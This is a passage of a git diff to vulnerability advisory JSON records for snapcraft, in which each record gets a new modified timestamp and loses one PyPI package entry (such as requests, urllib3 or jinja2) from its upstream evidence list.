@@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2012-5577", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-p86x-652p-6385", "CVE-2012-5577", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "keyring", - "subject_version": "25.7.0", - "key": "pkg:pypi/keyring@25.7.0", - "resource": "keyring" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2012-5578.json b/advisories/BREW-snapcraft-CVE-2012-5578.json index 728579a9130..2be105ff4df 100644 --- a/advisories/BREW-snapcraft-CVE-2012-5578.json +++ b/advisories/BREW-snapcraft-CVE-2012-5578.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2012-5578", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-8867-vpm3-g98g", "CVE-2012-5578", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "keyring", - "subject_version": "25.7.0", - "key": "pkg:pypi/keyring@25.7.0", - "resource": "keyring" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2013-1633.json b/advisories/BREW-snapcraft-CVE-2013-1633.json index cd670dfbda9..3a2d1515975 100644 --- a/advisories/BREW-snapcraft-CVE-2013-1633.json +++ b/advisories/BREW-snapcraft-CVE-2013-1633.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2013-1633", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-27x4-j476-jp5f", "CVE-2013-1633", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "80.8.0", - "key": "pkg:pypi/setuptools@80.8.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2013-2037.json b/advisories/BREW-snapcraft-CVE-2013-2037.json index bec6dc729f0..782f83cc6a6 100644 --- a/advisories/BREW-snapcraft-CVE-2013-2037.json +++ b/advisories/BREW-snapcraft-CVE-2013-2037.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2013-2037", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-q48q-77qv-cf9p", "CVE-2013-2037", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "httplib2", - "subject_version": "0.32.0", - "key": "pkg:pypi/httplib2@0.32.0", - "resource": "httplib2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2014-0012.json b/advisories/BREW-snapcraft-CVE-2014-0012.json index 86f618df1f7..0ae1f8409a6 100644 --- a/advisories/BREW-snapcraft-CVE-2014-0012.json +++ b/advisories/BREW-snapcraft-CVE-2014-0012.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2014-0012", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-fqh9-2qgg-h84h", "CVE-2014-0012", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2014-1402.json b/advisories/BREW-snapcraft-CVE-2014-1402.json index df2420494a5..3e36796608a 100644 --- a/advisories/BREW-snapcraft-CVE-2014-1402.json +++ b/advisories/BREW-snapcraft-CVE-2014-1402.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2014-1402", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-8r7q-cvjq-x353", "CVE-2014-1402", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2014-1624.json b/advisories/BREW-snapcraft-CVE-2014-1624.json index 86631cf5176..ddb014ac5c7 100644 --- a/advisories/BREW-snapcraft-CVE-2014-1624.json +++ b/advisories/BREW-snapcraft-CVE-2014-1624.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2014-1624", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-7372-q459-jxhr", "CVE-2014-1624", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyxdg", - "subject_version": "0.28", - "key": "pkg:pypi/pyxdg@0.28", - "resource": "pyxdg" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2014-1829.json b/advisories/BREW-snapcraft-CVE-2014-1829.json index cb15491bb34..cbf086af33a 100644 --- a/advisories/BREW-snapcraft-CVE-2014-1829.json +++ b/advisories/BREW-snapcraft-CVE-2014-1829.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2014-1829", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-cfj3-7x9c-4p3h", "CVE-2014-1829", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2014-1830.json b/advisories/BREW-snapcraft-CVE-2014-1830.json index ada0a554b27..ea6f4b8a6a1 100644 --- a/advisories/BREW-snapcraft-CVE-2014-1830.json +++ b/advisories/BREW-snapcraft-CVE-2014-1830.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2014-1830", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-652x-xj99-gmcc", "CVE-2014-1830", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2014-3146.json b/advisories/BREW-snapcraft-CVE-2014-3146.json index 6f0b96b0d83..99d388e7d92 100644 --- a/advisories/BREW-snapcraft-CVE-2014-3146.json +++ b/advisories/BREW-snapcraft-CVE-2014-3146.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2014-3146", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-57qw-cc2g-pv5p", "CVE-2014-3146", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", - "resource": "lxml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2015-2296.json b/advisories/BREW-snapcraft-CVE-2015-2296.json index 414ac9cf3e2..24dd2b338e4 100644 --- a/advisories/BREW-snapcraft-CVE-2015-2296.json +++ b/advisories/BREW-snapcraft-CVE-2015-2296.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2015-2296", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-pg2w-x9wp-vw92", "CVE-2015-2296", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2015-5237.json b/advisories/BREW-snapcraft-CVE-2015-5237.json index e302c0e2d51..8aa83d7917b 100644 --- a/advisories/BREW-snapcraft-CVE-2015-5237.json +++ b/advisories/BREW-snapcraft-CVE-2015-5237.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2015-5237", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-jwvw-v7c5-m82h", "CVE-2015-5237", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "protobuf", - "subject_version": "7.35.1", - "key": "pkg:pypi/protobuf@7.35.1", - "resource": "protobuf" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2016-10745.json b/advisories/BREW-snapcraft-CVE-2016-10745.json index 548bf430af5..43bb0a7f320 100644 --- a/advisories/BREW-snapcraft-CVE-2016-10745.json +++ b/advisories/BREW-snapcraft-CVE-2016-10745.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2016-10745", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-hj2j-77xm-mc5v", "CVE-2016-10745", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2016-9015.json b/advisories/BREW-snapcraft-CVE-2016-9015.json index 110bd75eca2..f30b62f36df 100644 --- a/advisories/BREW-snapcraft-CVE-2016-9015.json +++ b/advisories/BREW-snapcraft-CVE-2016-9015.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2016-9015", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-v4w5-p2hg-8fh6", "CVE-2016-9015", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2017-18342.json b/advisories/BREW-snapcraft-CVE-2017-18342.json index 3370ce9f75d..9059cdfe882 100644 --- a/advisories/BREW-snapcraft-CVE-2017-18342.json +++ b/advisories/BREW-snapcraft-CVE-2017-18342.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2017-18342", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-rprw-h62v-c2w7", "CVE-2017-18342", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2018-18074.json b/advisories/BREW-snapcraft-CVE-2018-18074.json index c308a989c29..09601ef290b 100644 --- a/advisories/BREW-snapcraft-CVE-2018-18074.json +++ b/advisories/BREW-snapcraft-CVE-2018-18074.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2018-18074", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-x84v-xcm2-53pg", "CVE-2018-18074", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2018-19787.json b/advisories/BREW-snapcraft-CVE-2018-19787.json index c09ff905dc7..e7117f53e89 100644 --- a/advisories/BREW-snapcraft-CVE-2018-19787.json +++ b/advisories/BREW-snapcraft-CVE-2018-19787.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2018-19787", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-xp26-p53h-6h2p", "CVE-2018-19787", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", - "resource": "lxml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2018-20060.json b/advisories/BREW-snapcraft-CVE-2018-20060.json index 4e237a038fa..6e7f4591d79 100644 --- a/advisories/BREW-snapcraft-CVE-2018-20060.json +++ b/advisories/BREW-snapcraft-CVE-2018-20060.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2018-20060", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-www2-v7xj-xrc6", "CVE-2018-20060", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2018-25091.json b/advisories/BREW-snapcraft-CVE-2018-25091.json index d85a769e217..01b72017b4a 100644 --- a/advisories/BREW-snapcraft-CVE-2018-25091.json +++ b/advisories/BREW-snapcraft-CVE-2018-25091.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2018-25091", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-gwvm-45gx-3cf8", "CVE-2018-25091", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2019-10906.json b/advisories/BREW-snapcraft-CVE-2019-10906.json index a5cd8614dd7..906877fc807 100644 --- a/advisories/BREW-snapcraft-CVE-2019-10906.json +++ b/advisories/BREW-snapcraft-CVE-2019-10906.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2019-10906", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-462w-v97r-4m45", "CVE-2019-10906", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2019-11236.json b/advisories/BREW-snapcraft-CVE-2019-11236.json index d99b4ca9930..25288edef5a 100644 --- a/advisories/BREW-snapcraft-CVE-2019-11236.json +++ b/advisories/BREW-snapcraft-CVE-2019-11236.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2019-11236", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-r64q-w8jr-g9qp", "CVE-2019-11236", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2019-11324.json b/advisories/BREW-snapcraft-CVE-2019-11324.json index 1caf726f75b..fa099ab410f 100644 --- a/advisories/BREW-snapcraft-CVE-2019-11324.json +++ b/advisories/BREW-snapcraft-CVE-2019-11324.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2019-11324", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-mh33-7rrq-662w", "CVE-2019-11324", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2019-12761.json b/advisories/BREW-snapcraft-CVE-2019-12761.json index cc6e28aa0fa..164a23a8380 100644 --- a/advisories/BREW-snapcraft-CVE-2019-12761.json +++ b/advisories/BREW-snapcraft-CVE-2019-12761.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2019-12761", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-r6v3-hpxj-r8rv", "CVE-2019-12761", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyxdg", - "subject_version": "0.28", - "key": "pkg:pypi/pyxdg@0.28", - "resource": "pyxdg" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2019-19588.json b/advisories/BREW-snapcraft-CVE-2019-19588.json index dcc0fe807f4..aa068fa857c 100644 --- a/advisories/BREW-snapcraft-CVE-2019-19588.json +++ b/advisories/BREW-snapcraft-CVE-2019-19588.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2019-19588", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-5qcg-w2cc-xffw", "CVE-2019-19588", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "validators", - "subject_version": "0.35.0", - "key": "pkg:pypi/validators@0.35.0", - "resource": "validators" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2019-20477.json b/advisories/BREW-snapcraft-CVE-2019-20477.json index 197de9ce2aa..03fa85a4a3a 100644 --- a/advisories/BREW-snapcraft-CVE-2019-20477.json +++ b/advisories/BREW-snapcraft-CVE-2019-20477.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2019-20477", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-3pqx-4fqf-j49f", "CVE-2019-20477", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2020-11078.json b/advisories/BREW-snapcraft-CVE-2020-11078.json index fdac54e487b..2faa8d4a62f 100644 --- a/advisories/BREW-snapcraft-CVE-2020-11078.json +++ b/advisories/BREW-snapcraft-CVE-2020-11078.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2020-11078", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-gg84-qgv9-w4pq", "CVE-2020-11078", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "httplib2", - "subject_version": "0.32.0", - "key": "pkg:pypi/httplib2@0.32.0", - "resource": "httplib2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2020-14343.json b/advisories/BREW-snapcraft-CVE-2020-14343.json index 3669bb6c7fc..3e04765ec71 100644 --- a/advisories/BREW-snapcraft-CVE-2020-14343.json +++ b/advisories/BREW-snapcraft-CVE-2020-14343.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2020-14343", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-8q59-q68h-6hv4", "CVE-2020-14343", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2020-1747.json b/advisories/BREW-snapcraft-CVE-2020-1747.json index 4bda2e76e85..7652f943035 100644 --- a/advisories/BREW-snapcraft-CVE-2020-1747.json +++ b/advisories/BREW-snapcraft-CVE-2020-1747.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2020-1747", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-6757-jp84-gxfx", "CVE-2020-1747", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2020-26137.json b/advisories/BREW-snapcraft-CVE-2020-26137.json index c5c260667d1..02c6de0c155 100644 --- a/advisories/BREW-snapcraft-CVE-2020-26137.json +++ b/advisories/BREW-snapcraft-CVE-2020-26137.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2020-26137", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-wqvq-5m8c-6g24", "CVE-2020-26137", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2020-27783.json b/advisories/BREW-snapcraft-CVE-2020-27783.json index c92d3b89f5a..cb3630563af 100644 --- a/advisories/BREW-snapcraft-CVE-2020-27783.json +++ b/advisories/BREW-snapcraft-CVE-2020-27783.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2020-27783", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-pgww-xf46-h92r", "CVE-2020-27783", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", - "resource": "lxml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2020-28493.json b/advisories/BREW-snapcraft-CVE-2020-28493.json index 06d0fe8b8a5..bffba3cfeec 100644 --- a/advisories/BREW-snapcraft-CVE-2020-28493.json +++ b/advisories/BREW-snapcraft-CVE-2020-28493.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2020-28493", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-g3rq-g295-4j3m", "CVE-2020-28493", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2020-7212.json b/advisories/BREW-snapcraft-CVE-2020-7212.json index c2f355cd3d8..3f6fa6f41e8 100644 --- a/advisories/BREW-snapcraft-CVE-2020-7212.json +++ b/advisories/BREW-snapcraft-CVE-2020-7212.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2020-7212", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-hmv2-79q8-fv6g", "CVE-2020-7212", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2021-21240.json b/advisories/BREW-snapcraft-CVE-2021-21240.json index 89259fdff11..49843c6e440 100644 --- a/advisories/BREW-snapcraft-CVE-2021-21240.json +++ b/advisories/BREW-snapcraft-CVE-2021-21240.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2021-21240", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-93xj-8mrv-444m", "CVE-2021-21240", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "httplib2", - "subject_version": "0.32.0", - "key": "pkg:pypi/httplib2@0.32.0", - "resource": "httplib2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2021-28363.json b/advisories/BREW-snapcraft-CVE-2021-28363.json index 38dec8dc5e1..172c6e38fdc 100644 --- a/advisories/BREW-snapcraft-CVE-2021-28363.json +++ b/advisories/BREW-snapcraft-CVE-2021-28363.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2021-28363", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-5phf-pp7p-vc2r", "CVE-2021-28363", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2021-28957.json 